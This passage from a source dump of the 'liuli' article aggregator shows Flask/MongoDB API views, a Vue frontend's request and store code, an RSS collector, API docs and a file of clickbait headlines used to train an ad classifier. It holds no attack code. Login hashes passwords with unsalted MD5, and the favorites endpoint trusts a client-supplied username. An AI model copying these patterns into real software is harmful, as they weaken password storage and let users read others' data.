"2022-06-29T03:10:56.418Z", 13 | "sortNum": 10000 14 | }, 15 | { 16 | "_id": "21dcc1ca-b76f-438e-9bf4-56ccb7713f82", 17 | "name": "action", 18 | "containerId": "", 19 | "created": "2022-06-29T03:21:27.330Z", 20 | "sortNum": 20000 21 | }, 22 | { 23 | "_id": "c98f2929-09db-49f3-8c86-1ac3e46e27de", 24 | "name": "stats", 25 | "containerId": "", 26 | "created": "2023-01-25T06:45:32.553Z", 27 | "sortNum": 30000 28 | }, 29 | { 30 | "_id": "95f1c08e-b988-42e9-80bb-343bb3dd34d9", 31 | "name": "doc_source", 32 | "containerId": "", 33 | "created": "2023-01-25T06:58:34.723Z", 34 | "sortNum": 40000 35 | }, 36 | { 37 | "_id": "258c0e98-4f4c-4069-aa44-fd25c05b4b07", 38 | "name": "utils", 39 | "containerId": "", 40 | "created": "2023-03-26T15:35:05.772Z", 41 | "sortNum": 15000 42 | }, 43 | { 44 | "_id": "97ee275d-e672-422e-a0d3-37dd1e9cb03c", 45 | "name": "bm", 46 | "containerId": "", 47 | "created": "2023-03-27T08:11:50.976Z", 48 | "sortNum": 35000 49 | }, 50 | { 51 | "_id": "3c6db4f4-64d5-4f08-be95-b956f4ffd15b", 52 | "name": "articles", 53 | "containerId": "", 54 | "created": "2023-05-05T09:19:49.826Z", 55 | "sortNum": 50000 56 | }, 57 | { 58 | "_id": "c5d260c3-6b03-487b-b904-b28c3245cf54", 59 | "name": "config", 60 | "containerId": "", 61 | "created": "2023-05-09T06:54:38.898Z", 62 | "sortNum": 12500 63 | }, 64 | { 65 | "_id": "f0921f46-bd6c-485c-9135-6f20012429f4", 66 | "name": "favorite", 67 | "containerId": "", 68 | "created": "2023-05-09T07:17:10.290Z", 69 | "sortNum": 60000 70 | } 71 | ] 72 | } 73 | ] -------------------------------------------------------------------------------- /liuli_web/src/api/httpRequest.ts: -------------------------------------------------------------------------------- 1 | import axios, { AxiosInstance } from 'axios'; 2 | import { ElNotification } from 'element-plus'; 3 | import { UserStore } from '@/store/user'; 4 | const axiosInstance: AxiosInstance = axios.create({ 5 | baseURL: '/api', 6 | timeout: 3000 7 | }); 8 | 9 | axiosInstance.interceptors.request.use( 10 | // 请求拦截器 11 | (config) => { 12 | // 注入token 13 | const uerStore = UserStore(); 14 | if (uerStore.token) { 15 | // 如果token存在 注入token 16 | config.headers!.Authorization = `Bearer ${uerStore.token}`; 17 | } 18 | // console.log(config); 19 | return config; 20 | }, 21 | (error) => { 22 | return Promise.reject(error); 23 | } 24 | ); 25 | 26 | axiosInstance.interceptors.response.use( 27 | // 响应拦截器 28 | (response) => { 29 | // 此处 status 表示 http 请求状态码 200 30 | if (response.status == 200) { 31 | // 此处 status 表示服务端自定义的状态码 32 | const { data, info, status } = response.data; 33 | return { 34 | data: data, 35 | info: info, 36 | status: status 37 | }; 38 | } else { 39 | console.log('非 200 响应', response.data); 40 | return Promise.reject(new Error(response.data)); 41 | } 42 | }, 43 | (error) => { 44 | // if (error.response && error.response.data && error.response.data.status === 401) { 45 | // store.logout(); 46 | // } 47 | const uerStore = UserStore(); 48 | 49 | if (typeof error.response == 'undefined') { 50 | // 超时无响应 51 | console.log('服务器超时', error.response); 52 | return { 53 | data: {}, 54 | info: '', 55 | status: 408 56 | }; 57 | } 58 | 59 | if (error.response.status == 422 || error.response.status == 401) { 60 | // token 被篡改,格式错误 61 | ElNotification({ 62 | message: error.response.data.msg, 63 | type: 'error', 64 | duration:2000 65 | }); 66 | setTimeout(()=> uerStore.logout(), 3000); 67 | } 68 | return Promise.reject(error); 69 | } 70 | ); 71 | 72 | const Request = { 73 | post(url: string, data: object = {}): Promise { 74 | try { 75 | return axiosInstance.post(url, data); 76 | } catch (error) { 77 | throw Error('请求失败'); 78 | } 79 | }, 80 | }; 81 | 82 | export default Request; 83 | -------------------------------------------------------------------------------- /liuli_web/vite.config.ts: -------------------------------------------------------------------------------- 1 | import { defineConfig } from 'vite'; 2 | import vue from '@vitejs/plugin-vue'; 3 | import { createSvgIconsPlugin } from 'vite-plugin-svg-icons' 4 | const path = require('path'); 5 | // https://vitejs.dev/config/ 6 | export default defineConfig({ 7 | plugins: [ 8 | vue({ 9 | template: { 10 | compilerOptions: { 11 | isCustomElement: (tag) => tag === 'hgroup' 12 | } 13 | } 14 | }), 15 | createSvgIconsPlugin({ 16 | // 指定需要缓存的图标文件夹 17 | iconDirs: [path.resolve(process.cwd(), 'src/assets/icons')], 18 | // 指定symbolId格式 19 | symbolId: 'icon-[dir]-[name]', 20 | 21 | /** 22 | * 自定义插入位置 23 | * @default: body-last 24 | */ 25 | inject: 'body-last', 26 | 27 | /** 28 | * custom dom id 29 | * @default: __svg__icons__dom__ 30 | */ 31 | customDomId: '__svg__icons__dom__', 32 | }), 33 | ], 34 | build: { 35 | brotliSize: false, 36 | // 消除打包大小超过500kb警告 37 | chunkSizeWarningLimit: 2000, 38 | minify: 'terser', 39 | // 在生产环境移除console.log 40 | terserOptions: { 41 | compress: { 42 | drop_console: true, 43 | drop_debugger: true, 44 | }, 45 | }, 46 | assetsDir: 'static/assets', 47 | // 静态资源打包到dist下的不同目录 48 | rollupOptions: { 49 | output: { 50 | chunkFileNames: 'static/js/[name]-[hash].js', 51 | entryFileNames: 'static/js/[name]-[hash].js', 52 | assetFileNames: 'static/[ext]/[name]-[hash].[ext]', 53 | }, 54 | }, 55 | }, 56 | resolve: { 57 | // 配置路径别名 58 | alias: { 59 | '@': path.resolve(__dirname, './src'), 60 | }, 61 | // 导入简化后缀名 62 | extensions: ['.mjs', '.js', '.ts', '.jsx', '.tsx', '.json', '.vue'] 63 | }, 64 | css: { 65 | preprocessorOptions: { 66 | // 全局引入了 scss 的文件 67 | scss: { 68 | javascriptEnabled: true, 69 | }, 70 | }, 71 | }, 72 | server: { 73 | host: true, 74 | port: 8080, 75 | open: false, 76 | https: false, 77 | proxy: { 78 | '/api': { 79 | target: 'http://192.168.1.50:8765', 80 | changeOrigin: true, 81 | // rewrite: (path) => path.replace('/api', ''), 82 | } 83 | } 84 | } 85 | }); 86 | -------------------------------------------------------------------------------- /liuli_web/src/store/user.ts: -------------------------------------------------------------------------------- 1 | import { defineStore,storeToRefs } from 'pinia'; 2 | import piniaPersistConfig from '@/config/piniaPersist'; 3 | import { ref } from 'vue'; 4 | import { userApi } from '@/api'; 5 | import { ILoginParams } from '@/api/modules/user/interface' 6 | 7 | export const UserStore = defineStore( 8 | 'liuli-user-store-id', 9 | () => { 10 | const token = ref('',); 11 | const username=ref(''); 12 | 13 | const login = async (data:ILoginParams)=>{ 14 | const res= await userApi.login(data) 15 | if(res.status==200){ 16 | token.value = res.data.token 17 | username.value = res.data.username 18 | } 19 | return res; 20 | } 21 | 22 | const logout= ()=>{ 23 | token.value = '' 24 | username.value = '' 25 | window.location.href = '/login' 26 | } 27 | 28 | 29 | 30 | 31 | return { 32 | token, 33 | username, 34 | login, 35 | logout, 36 | }; 37 | }, 38 | { persist: piniaPersistConfig('liuli-user-store-id') }, 39 | ); 40 | 41 | export const useUserStore = () => storeToRefs(UserStore()); 42 | 43 | 44 | 45 | // export const useUserStore = defineStore('user', { 46 | // state: () => { 47 | // return { token: '', username: '' }; 48 | // }, 49 | // getters: { 50 | // getToken: (state) => { 51 | // return state.token; 52 | // }, 53 | // getUsername: (state) => { 54 | // return state.username; 55 | // } 56 | // }, 57 | // actions: { 58 | // setToken(token: string, username: string) { 59 | // this.token = token; 60 | // this.username = username; 61 | // setLiuliToken(state) 62 | // }, 63 | // resetState() { 64 | // this.token = ''; 65 | // this.username = ''; 66 | // setLiuliToken(state) 67 | // }, 68 | 69 | // async login(data: { username: any; password: any; }) { 70 | // // 登录获取 Token 71 | // const res = await api.login(data); 72 | // if (res.status == 200) { 73 | // console.log('正在持久化 Token!'); 74 | // this.setToken(res.data.token, res.data.username); 75 | // } 76 | // return new Promise((resolve, reject) => { 77 | // resolve(res); 78 | // }); 79 | // }, 80 | 81 | // async logout() { 82 | // this.resetState(); 83 | // removeLiuliToken(); 84 | // } 85 | // } 86 | // }); 87 | -------------------------------------------------------------------------------- /src/api/views/api/favorite/get.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 获取 favorite 列表 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase 18 | 19 | 20 | @jwt_required() 21 | def favorite_get(): 22 | """ 23 | 获取 favorite 列表 24 | eg: 25 | { 26 | "username": "liuli", 27 | "page": 1, 28 | "page_size": 2 29 | } 30 | """ 31 | # 获取基本配置 32 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 33 | app_logger = current_app.config["app_logger"] 34 | coll = mongodb_base.get_collection(coll_name="liuli_favorite") 35 | username = request.json["username"] 36 | post_data: dict = request.json 37 | page = post_data.get("page", 1) 38 | page_size = post_data.get("page_size", 20) 39 | try: 40 | db_res = coll.aggregate( 41 | [ 42 | {"$match": {"username": username}}, 43 | { 44 | "$lookup": { 45 | "from": "liuli_articles", 46 | "localField": "doc_id", 47 | "foreignField": "doc_id", 48 | "as": "doc", 49 | } 50 | }, 51 | { 52 | "$project": { 53 | "_id": 0, 54 | "doc": {"_id": 0, "doc_core_html": 0, "doc_content": 0}, 55 | } 56 | }, 57 | {"$skip": (page - 1) * page_size}, 58 | {"$limit": page_size}, 59 | ] 60 | ) 61 | db_res_list = list(db_res) 62 | result = { 63 | ResponseField.DATA: {"rows": db_res_list, "total": len(db_res_list)}, 64 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 65 | ResponseField.STATUS: ResponseCode.SUCCESS, 66 | } 67 | except Exception as e: 68 | result = UniResponse.DB_ERR 69 | err_info = f"search user favorite doc failed! DB response info -> {e}" 70 | app_logger.error(err_info) 71 | 72 | return response_handle(request=request, dict_value=result) 73 | -------------------------------------------------------------------------------- /src/api/views/api/action/articles.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 查询历史文章 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import json 7 | 8 | from flask import current_app, request 9 | 10 | from src.api.common import ( 11 | ResponseCode, 12 | ResponseField, 13 | ResponseReply, 14 | UniResponse, 15 | jwt_required, 16 | response_handle, 17 | ) 18 | from src.databases import MongodbBase, mongodb_find_by_page 19 | 20 | 21 | @jwt_required() 22 | def action_articles(): 23 | """查询历史文章 24 | { 25 | "username": "liuli", 26 | "doc_source": "liuli_wechat", 27 | "doc_source_name": "", 28 | "size": 10, 29 | "page": 1, 30 | "sorted_order": 1 31 | } 32 | 33 | Returns: 34 | Response: 响应类 35 | """ 36 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 37 | app_logger = current_app.config["app_logger"] 38 | coll = mongodb_base.get_collection(coll_name="liuli_articles") 39 | # 获取基础数据 40 | post_data: dict = request.json 41 | doc_source = post_data.get("doc_source", "") 42 | doc_source_name = post_data.get("doc_source_name", "") 43 | size = post_data.get("size", 10) 44 | page = post_data.get("page", 1) 45 | filter_dict = {"doc_source": doc_source} if doc_source else {} 46 | if doc_source_name: 47 | filter_dict.update({"doc_source_name": doc_source_name}) 48 | db_res = mongodb_find_by_page( 49 | coll_conn=coll, 50 | filter_dict=filter_dict, 51 | size=size, 52 | page=page, 53 | return_dict={"doc_content": 0, "doc_core_html": 0, "doc_html": 0}, 54 | sorted_list=[("doc_ts", post_data.get("sorted_order", -1))], 55 | ) 56 | db_info = db_res["info"] 57 | if db_res["status"]: 58 | # 对于 _id 做强制 str 处理 59 | return json.dumps( 60 | { 61 | ResponseField.DATA: {**db_info, **{"size": size, "page": page}}, 62 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 63 | ResponseField.STATUS: ResponseCode.SUCCESS, 64 | }, 65 | default=str, 66 | ) 67 | else: 68 | result = UniResponse.DB_ERR 69 | err_info = f"query doc articles failed! DB response info -> {db_info}" 70 | app_logger.error(err_info) 71 | 72 | return response_handle(request=request, dict_value=result) 73 | -------------------------------------------------------------------------------- /src/collector/feed_common/start.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by leeorz. 3 | Description:抓取目标rss,并解析rss条目,持久化到mongodb 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import time 7 | 8 | import feedparser 9 | 10 | from src.collector.utils import load_data_to_articlles 11 | from src.common.remote import get_html_by_requests 12 | from src.config import Config 13 | from src.processor.text_utils import extract_core_html 14 | from src.utils.log import LOGGER 15 | from src.utils.tools import md5_encryption, text_compress 16 | 17 | 18 | def run(collect_config: dict): 19 | """rss解析,rss条目持久化 20 | 21 | Args: 22 | collect_config (dict, optional): 采集器配置 23 | """ 24 | feeds_dict: dict = collect_config.get("feeds_dict") 25 | feeds_name: list = list(feeds_dict) 26 | delta_time = collect_config.get("delta_time", 1) 27 | for name in feeds_name: 28 | LOGGER.info(f"rss源 {name}: {feeds_dict[name]}") 29 | fd = feedparser.parse(feeds_dict[name]) 30 | for entry in fd.entries: 31 | LOGGER.info(entry.link) 32 | # 休眠 33 | time.sleep(delta_time) 34 | resp_text = get_html_by_requests( 35 | url=entry.link, 36 | headers={"User-Agent": Config.LL_SPIDER_UA}, 37 | ) 38 | _, doc_core_html = extract_core_html(resp_text) 39 | doc_core_html_lib = text_compress(doc_core_html) 40 | input_data = { 41 | "doc_date": entry.get("published", ""), 42 | "doc_image": "", 43 | "doc_name": entry.get("title", ""), 44 | "doc_ts": int(time.time()), 45 | "doc_link": entry.get("link", ""), 46 | "doc_source_meta_list": [], 47 | "doc_keywords": " ", 48 | "doc_des": entry.get("description", ""), 49 | "doc_core_html": doc_core_html_lib, 50 | "doc_type": "article", 51 | "doc_author": "", 52 | "doc_source_name": name, 53 | "doc_id": md5_encryption(f"{entry.get('title', '')}_{name}"), 54 | "doc_source": "liuli_feed", 55 | "doc_source_account_nick": "", 56 | "doc_source_account_intro": "", 57 | "doc_content": "", 58 | "doc_html": "", 59 | } 60 | load_data_to_articlles(input_data) 61 | msg = "🤗 liuli_feed 采集器执行完毕" 62 | LOGGER.info(msg) 63 | -------------------------------------------------------------------------------- /src/classifier/model_data/cos/train_bak.txt: -------------------------------------------------------------------------------- 1 | 急!还缺230万! 2 | 35岁,转行AI年薪100万,牛逼的人生无需解释 3 | 我想涨工资 4 | 推荐一个CV神器! 5 | 字节跳动月薪50k招高级运营,看到要求我傻眼了! 6 | 知乎热榜:程序员达到什么水平能拿到20k月薪 7 | 面试题:谈谈Vue和React的区别? 8 | 死磕FB大佬算法“标答”,一个月上岸Google! 9 | 80w年薪入职阿里,Node.js必须引起重视了 10 | 35岁,没有公司会为你的阅历买单 11 | 腾讯年薪50W招产品经理,看到要求我傻眼了 12 | 字节跳动再扩招 10000 人,看到要求傻眼了 13 | 普通人搞一百万有多难? 14 | 不论跳不跳槽,简历越早写上这个,越稳!!! 15 | 4 轮拿下腾讯Offer! 16 | 字节跳动再扩招1000人,招聘要求让人窒息! 17 | 人均月薪6万起,网友:酸! 18 | 没有性生活的女人,都很穷?! 19 | 一份来自阿里P9的职场晋升指南 20 | 赚了赚了! 21 | 面试官:谈谈vue 和 React的异同点 22 | 清华牛人是怎么玩数据分析的? 23 | 这个买房忠告,你一定要听 24 | 刚刚!字节跳动启动史上最大规模扩招,急缺这类产品经理! 25 | B站疯传,堪称最强,一套Python数据分析资源,白拿不谢! 26 | 这些springboot项目真牛逼【视频+源码】【开源】【白嫖】 27 | 为什么 Django 框架持续统治着 Python 开发? 28 | 字节跳动月薪5万招产品经理,看到要求我傻眼了! 29 | 推荐一个论文复现神器! 30 | 跟你说个笑话,我毕业二年了,天天人肉提数... 31 | 能做对这道算法题的人,最后都去了脸书! 32 | 字节跳动月薪3万招的岗位,看到要求我傻眼了! 33 | 赚的那点钱算个毛啊! 34 | 字节月薪6万招B端产品经理,看到要求我傻眼了! 35 | 阿里 P9 揭秘职场晋升"潜规则" 36 | 升级版《走遍美国》78集,每天抽空看5分钟,英语水平赶超9成中国人! 37 | 2021大数据开发面试高频100题最新汇总(附答案详解) | 极客大学 38 | 4轮面试拿下阿里 offer,我必须吹爆这份 RocketMQ 笔记! 39 | 当你提问的时候,你在想什么? 40 | “我工资3000,靠短视频月入3万”! 41 | 闲鱼99元买的大数据手记,靠谱! 42 | 4轮拿下字节 Offer,月资45k,我吹爆这份笔记 43 | 为什么我不建议你给领导回复“收到”? 44 | 字节跳动月薪6万招运营,看到要求我傻眼了! 45 | 给大家整理的93家大厂面试真题,校招社招都有 46 | 说实话Netty真的挺难的! 47 | 活久见,自己创造的框架竟然比开源的好用 48 | 刚刚!字节跳动启动史上最大规模扩招,急缺这类Python人才! 49 | 亏成狗了怎么办 50 | 为什么那些年薪百万的架构师总免不了在微服务上栽跟头? 51 | 90后是如何一边还房贷,一边理财的? 52 | 抢钱的时代,真没功夫磨磨唧唧 53 | 5 年前红到发紫的中台,今天果实只剩数据中台?阿里专家:吸取教训! 54 | 2021年,字节跳动月薪50k招高级运营,这个要求过分吗? 55 | 学了这么久Python,竟然还没有搞清楚这件事……?! 56 | 算法不重要?你去大厂试试! 57 | 哥们别闹,你离资深前端还远着呢 58 | 都是技术出身,可昨晚我看了张一鸣的微博后,让我越想越后怕... 59 | 年入百万有多难?又该如何年入百万 60 | 4个写进简历的京东AI项目实战 61 | 三流面试问技术,二流面试问平台,一流面试…… 62 | 97年女孩做兼职,一年存了30万:有本事赚钱的人,都懂这一点 63 | 28岁华为员工工资表曝光,牛逼的人注定会牛逼 64 | 字节跳动到底有多缺人? 65 | 笑死,现在还真是什么人都敢当程序员了 66 | 那些在一个公司死磕了5-10年的人,最后都怎么样了? 67 | 为什么领导不喜欢提拔老实人?这是我听过最醍醐灌顶的回答 68 | 没有X生活的女人,都很穷 69 | 字节 Offer月薪 45k,爽! 70 | 给想进大厂的朋友一条忠告! 71 | 推荐一位在BAT大厂工作的技术+美女双料博主 72 | 毕业4年,我用睡后收入买了两套房 73 | 基金为何暴跌,教你用Python揭穿其中奥秘! 74 | 年入百万的朋友为什么都聚到这里? 75 | 2021年,字节跳动疯狂扩招3000人,看到要求我傻眼了! 76 | 从财务自由说起 77 | 实践出真知! 78 | 认知水平越低的人,越喜欢回复“收到” 79 | 干了5年程序员,我竟然遭遇到了“招聘暴力”! 80 | 晋升 Leader 后,99% 的程序员还不懂怎么面试别人! 81 | 头发越洗越油?因为你一直在无效洗头 82 | 跳槽大厂数分岗位,需要准备什么? 83 | 人脸识别,凉了? 84 | 升级版《走遍美国》78 集,有人说每天抽空看 5 分钟,英语水平赶超 9 成中国人 85 | 收到字节 Offer,月薪 45k,爽! 86 | 收入高也焦虑! 87 | 你多久没有性生活了 88 | 深度学习新贵?经验不限,月薪可达6万! 89 | 2021大数据开发面试高频100题最新汇总(附答案详解) 90 | 升级版《走遍美国》78集,每天抽空看5分钟,英语水平赶超9成中国人!(内附资源) 91 | 马云为什么说数据分析师会消失? 92 | 面试官:谈谈vue 和 React的区别及选型考虑 93 | Kafka淘汰倒计时!大数据人必备的新一代消息平台,彻底火了? 94 | 字节面试官:惊了,面试100个实习生,清一色的学PyTorch... 95 | 太火了!5 天面试了 10 家公司,都在问 Vue3.0+Typescript 96 | 想抄底怎么办? 97 | 字节跳动月薪 5 万招运营,看到要求我傻眼了 98 | -------------------------------------------------------------------------------- /src/classifier/utils.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/04/27. 4 | Description: 模型相关通用工具函数 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | import os 8 | 9 | import pandas as pd 10 | 11 | from pypinyin import lazy_pinyin 12 | 13 | from src.config import Config 14 | from src.utils import load_text_to_list 15 | 16 | 17 | def text2py(text): 18 | """ 19 | 中文文本转成拼音 20 | :param text: 21 | :return: 22 | """ 23 | 24 | return "".join(lazy_pinyin(text)) 25 | 26 | 27 | def ads2txt(target_path: str = ""): 28 | """ 29 | 提取广告CSV中的标题作为广告样本 30 | :param target_path: 目标写入地址 31 | :return: 32 | """ 33 | target_path = target_path or os.path.join(Config.MODEL_DIR, f"cos/train.txt") 34 | his_text_list = load_text_to_list(target_path) 35 | 36 | ads_path = os.path.join(Config.DS_DIR, "clean_ads.csv") 37 | df = pd.read_csv(ads_path) 38 | 39 | df["text"] = df["title"] + " " + df["keywords"] 40 | 41 | # all_text = set(df["title"].drop_duplicates().values.tolist() + his_text_list) 42 | all_text = set(df["text"].drop_duplicates().values.tolist() + his_text_list) 43 | 44 | with open(target_path, "w") as fp: 45 | for title in all_text: 46 | fp.write(title + "\n") 47 | 48 | print(f"{target_path} 写入成功,共 {len(all_text)} 条记录") 49 | 50 | 51 | def gen_alphabet() -> str: 52 | """ 53 | 基于 .files/datasets 目录下的数据集,生成字幕文件 54 | i(,l)h《$9a~“g」”』~.?j7·x)—;}'》k`|&>rvf5*0q:de{/":?w3,_ys#|^8-『】[41%!<「bn+(om…6【tp=!c@uz]\2 55 | """ 56 | # 基础字符列表 57 | character_list = list( 58 | "abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:'\"/\\|_@#$%^&*~`+-=<>()[]{}" 59 | ) 60 | 61 | for file_name in ["final_ads.csv", "final_normal.csv"]: 62 | full_path = os.path.join(Config.DS_DIR, file_name) 63 | df = pd.read_csv(full_path) 64 | for each in df["text"].values: 65 | for word in each.strip().split(" "): 66 | for character in list(word): 67 | if character: 68 | character_list.append(character.lower()) 69 | 70 | return "".join(list(set(character_list))) 71 | 72 | 73 | if __name__ == "__main__": 74 | # from collections import Counter 75 | # 76 | # df = pd.read_csv(os.path.join(Config.DS_DIR, "clean_ads.csv")) 77 | # print(Counter(df["title"].values.tolist())) 78 | 79 | ads2txt() 80 | # character_str = gen_alphabet() 81 | # print(character_str) 82 | -------------------------------------------------------------------------------- /docs/接口文档/04.接口说明[doc_source].md: -------------------------------------------------------------------------------- 1 | ## 删除 2 | 3 | ### 描述 4 | 5 | 删除 doc_source 6 | 7 | ### URL路径 8 | 9 | /doc_source/delete 10 | 11 | ### 请求方式 12 | 13 | POST 14 | 15 | ### 请求参数 16 | 17 | | 参数名 | 类型 | 必选 | 描述 | 18 | | ---------- | ------ | ---- | ------ | 19 | | username | string | 是 | 用户名 | 20 | | doc_source | string | 否 | 订阅源 | 21 | 22 | ### 返回参数 23 | 24 | 响应返回的是接口标准的通用响应. 25 | 26 | ### 请求示例 27 | 28 | ```json 29 | { 30 | "username": "liuli", 31 | "doc_source": "liuli_wechat" 32 | } 33 | ``` 34 | 35 | ### 返回示例 36 | 37 | #### 成功示例 38 | 39 | ```json 40 | { 41 | "data": {}, 42 | "info": "ok", 43 | "status": 200 44 | } 45 | ``` 46 | 47 | #### 失败示例 48 | 49 | ```json 50 | { 51 | "data": {}, 52 | "info": "数据库操作错误", 53 | "status": 500 54 | } 55 | ``` 56 | 57 | ## 获取 58 | 59 | ### 描述 60 | 61 | 获取 doc_source 62 | 63 | ### URL路径 64 | 65 | /doc_source/get 66 | 67 | ### 请求方式 68 | 69 | POST 70 | 71 | ### 请求参数 72 | 73 | | 参数名 | 类型 | 必选 | 描述 | 74 | | ---------- | ------ | ---- | ------ | 75 | | username | string | 是 | 用户名 | 76 | | doc_source | string | 否 | 订阅源 | 77 | 78 | ### 返回参数 79 | 80 | 响应返回的是接口标准的通用响应. 81 | 82 | ### 请求示例 83 | 84 | ```json 85 | { 86 | "username": "liuli", 87 | "doc_source": "liuli_wechat" 88 | } 89 | ``` 90 | 91 | ### 返回示例 92 | 93 | #### 成功示例 94 | 95 | 见 [liuli](https://github.com/howie6879/liuli) 项目配置示例:[wechat.json](https://github.com/howie6879/liuli/blob/main/liuli_config/wechat.json) 96 | 97 | #### 失败示例 98 | 99 | ```json 100 | { 101 | "data": "", 102 | "info": "获取不到 doc_source 配置", 103 | "status": 905 104 | } 105 | ``` 106 | 107 | ## 更新 108 | 109 | ### 描述 110 | 111 | 更新 doc_source 112 | 113 | ### URL路径 114 | 115 | /doc_source/update 116 | 117 | ### 请求方式 118 | 119 | POST 120 | 121 | ### 请求参数 122 | 123 | 见 [liuli](https://github.com/howie6879/liuli) 项目配置示例:[wechat.json](https://github.com/howie6879/liuli/blob/main/liuli_config/wechat.json) 124 | 125 | ### 返回参数 126 | 127 | 响应返回的是接口标准的通用响应. 128 | 129 | ### 请求示例 130 | 131 | 见 [liuli](https://github.com/howie6879/liuli) 项目配置示例:[wechat.json](https://github.com/howie6879/liuli/blob/main/liuli_config/wechat.json) 132 | 133 | ### 返回示例 134 | 135 | #### 成功示例 136 | 137 | ```json 138 | { 139 | "data": {}, 140 | "info": "ok", 141 | "status": 200 142 | } 143 | ``` 144 | 145 | #### 失败示例 146 | 147 | ```json 148 | { 149 | "data": {}, 150 | "info": "数据库操作错误", 151 | "status": 500 152 | } 153 | ``` 154 | -------------------------------------------------------------------------------- /src/api/views/api/user/login.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 用户登录接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import datetime 7 | 8 | from flask import current_app, request 9 | from flask_jwt_extended import create_access_token 10 | 11 | from src.api.common import ResponseCode, ResponseField, ResponseReply, response_handle 12 | from src.databases import MongodbBase, mongodb_find 13 | from src.utils import md5_encryption 14 | 15 | 16 | def user_login(): 17 | """用户登录接口 18 | eg: 19 | { 20 | "username": "liuli", 21 | "password": "liuli" 22 | } 23 | Token Demo: 24 | "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTYyNzc1MDQ1OCwianRpIjoiNzJjZjZkYzYtZDE5NS00NGRhLTg2NWUtNmNhZmY3MTdkMjMwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6MTU3Njc5NTY4OTAsIm5iZiI6MTYyNzc1MDQ1OH0.xwUuyTYoXFIymE6RqnEuuteyFbYiMmY72YYtIUMfqNY" 25 | Returns: 26 | Response: Flask响应类 27 | """ 28 | # 获取基本配置 29 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 30 | app_logger = current_app.config["app_logger"] 31 | coll = mongodb_base.get_collection(coll_name="liuli_user") 32 | # 获取基础数据 33 | post_data: dict = request.json 34 | username = post_data.get("username", "") 35 | password = post_data.get("password", "") 36 | user_db_res = mongodb_find( 37 | coll_conn=coll, 38 | filter_dict={"username": username, "password": md5_encryption(password)}, 39 | return_dict={"_id": 0}, 40 | ) 41 | user_info_list = user_db_res["info"] 42 | if username and password and user_db_res["status"] and len(user_info_list) == 1: 43 | # 半年过期一次 259200 44 | expires_delta = datetime.timedelta(minutes=259200) 45 | access_token = create_access_token( 46 | identity=username, expires_delta=expires_delta 47 | ) 48 | result = { 49 | ResponseField.DATA: {"token": access_token, "username": username}, 50 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 51 | ResponseField.STATUS: ResponseCode.SUCCESS, 52 | } 53 | else: 54 | result = { 55 | ResponseField.DATA: {}, 56 | ResponseField.MESSAGE: ResponseReply.USER_LOGIN_ERROR, 57 | ResponseField.STATUS: ResponseCode.USER_LOGIN_ERROR, 58 | } 59 | err_info = f"login failed! DB response info -> {user_db_res}" 60 | app_logger.error(err_info) 61 | 62 | return response_handle(request=request, dict_value=result) 63 | -------------------------------------------------------------------------------- /src/api/views/api/articles/search.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-05. 3 | Description: 文档搜索接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from flask import current_app, request 7 | 8 | from src.api.common import ( 9 | ResponseCode, 10 | ResponseField, 11 | ResponseReply, 12 | UniResponse, 13 | jwt_required, 14 | response_handle, 15 | ) 16 | from src.databases import MongodbBase, mongodb_find_by_page 17 | 18 | 19 | @jwt_required() 20 | def articles_search(): 21 | """获取 文章 22 | eg: 23 | { 24 | "username": "liuli", 25 | "doc_source": "wechat", 26 | "doc_source_name": "", 27 | "doc_name":"老胡的周刊(第089期)", 28 | "doc_type": "", 29 | "page": 1, 30 | "page_size": 2 31 | } 32 | Returns: 33 | Response: 响应类 34 | """ 35 | # 获取基本配置 36 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 37 | app_logger = current_app.config["app_logger"] 38 | coll = mongodb_base.get_collection(coll_name="liuli_articles") 39 | # 获取基础数据 40 | post_data: dict = request.json 41 | doc_type = post_data.get("doc_type", "") 42 | doc_source = post_data.get("doc_source", "") 43 | doc_source_name = post_data.get("doc_source_name", "") 44 | doc_name = post_data.get("doc_name", "") 45 | page = post_data.get("page", 1) 46 | page_size = post_data.get("page_size", 20) 47 | 48 | filter_dict = {} 49 | 50 | if doc_source: 51 | filter_dict["doc_source"] = doc_source 52 | if doc_source_name: 53 | filter_dict["doc_source_name"] = {"$regex": doc_source_name, "$options": "$i"} 54 | if doc_name: 55 | filter_dict["doc_name"] = doc_name 56 | if doc_type: 57 | filter_dict["doc_type"] = doc_type 58 | 59 | result = UniResponse.SUCCESS 60 | 61 | db_res: dict = mongodb_find_by_page( 62 | coll_conn=coll, 63 | filter_dict=filter_dict, 64 | size=page_size, 65 | page=page, 66 | return_dict={"_id": 0, "doc_content": 0, "doc_core_html": 0}, 67 | sorted_list=[("doc_ts", -1)], 68 | ) 69 | 70 | if db_res["status"]: 71 | result = { 72 | ResponseField.DATA: db_res["info"], 73 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 74 | ResponseField.STATUS: ResponseCode.SUCCESS, 75 | } 76 | else: 77 | result = UniResponse.DB_ERR 78 | err_info = f"search articles failed! DB response info -> 